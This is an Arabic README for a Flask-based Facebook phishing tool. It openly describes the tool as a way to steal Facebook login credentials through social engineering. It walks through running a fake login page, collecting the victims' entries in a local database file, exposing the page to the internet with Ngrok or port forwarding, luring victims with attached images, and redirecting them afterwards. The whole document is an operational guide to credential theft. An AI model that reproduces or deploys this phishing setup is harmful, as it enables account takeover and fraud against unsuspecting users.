
أداة خادم بايثون مبنية على Flask، يمكن لهذه الأداة تصيد بعض بيانات اعتماد فيسبوك!
المؤلف الأصلي : Arslan Mughal
بـ: arjunindia
المستودع الأصلي : https://github.com/arslanmughal5566/facebook_phishing
باستخدام هذا السكريبت يمكنك سرقة بيانات تسجيل الدخول إلى فيسبوك باستخدام بعض مهارات الهندسة الاجتماعية.
1 : Python3.x 2 : Flask لتثبيت Flask افتح الطرفية واكتب الأمر التالي:
user@repo~# pip3 install flask
تأكد من تثبيت python 3 قبل تثبيت flask، إذا كنت تستخدم ويندوز أو ماك فقم أولاً بتنزيل وتثبيت python3
قم باستنساخ المستودع وافتح الطرفية في مجلد المصدر ثم شغل app.py
user@repo~# python3 app.py
الآن افتح متصفحك واذهب إلى 0.0.0.0 أو localhost أو عنوان IP المحلي الخاص بك.
ستظهر صفحة تسجيل الدخول إلى فيسبوك. اكتب بيانات الدخول واضغط على تسجيل الدخول. لن يحدث شيء ظاهرياً لكن استمر معي :)
اذهب إلى مجلد المصدر ثم إلى مجلد database ستجد ملفاً واحداً باسم db_1 :
../database/db_1
افتحه وستجد بيانات الدخول التي أدخلتها في صفحة تسجيل الدخول محفوظة في ملف db_1
هذه هي طريقة الهجوم على نفس الشبكة، ولكن يمكنك أيضاً تنفيذ الهجوم خارج الشبكة باستخدام Ngrok
يمكنك بالتأكيد استخدام إعادة توجيه المنافذ. قم بإعادة توجيه المنفذ 80 (منفذ خادم HTTP) والآن يمكنك استخدام الصفحة عبر الشبكة الواسعة (WAN).
يمكنك أيضاً إرفاق صورة أو أي شيء آخر مع الرابط بحيث يقوم المستخدم بإدخال بيانات الدخول فوراً.
شغل هذا الأمر:- git stash && git pull
1) جعل الصفحة متوافقة مع الجوال.
2) تم إنشاء صفحة أخرى b.html سيتم توجيه الصفحة إليها بعد الإرسال. قم بتغيير المتغير url في ملف b.html داخل مجلد templates إلى صفحة الويب التي تريد توجيه الضحية إليها.
=> تمت إضافة ./install.sh. الآن إذا قمت بالتثبيت باستخدام السكريبت، يمكنك استخدام الأمر 'facebooker' لتشغيل الأداة.
يمكنك تثبيت السكريبت عن طريق:-
user@repo:~# cd fb-phisher-python
user@repo:fb-phisher-python# chmod +x install.sh
user@repo:fb-phisher-python# ./install.sh
الآن يمكنك تشغيله بكتابة 'facebooker'
user@repo:~# facebooker
=> تمت إضافة وظيفة إضافية، وهي وظيفة جديدة لتعديل الرابط الذي سيتم التوجيه إليه بسهولة. قم بالتثبيت باستخدام install.sh، وشغل بالأمر facebooker وسيطلب منك الرابط الجديد أثناء التشغيل.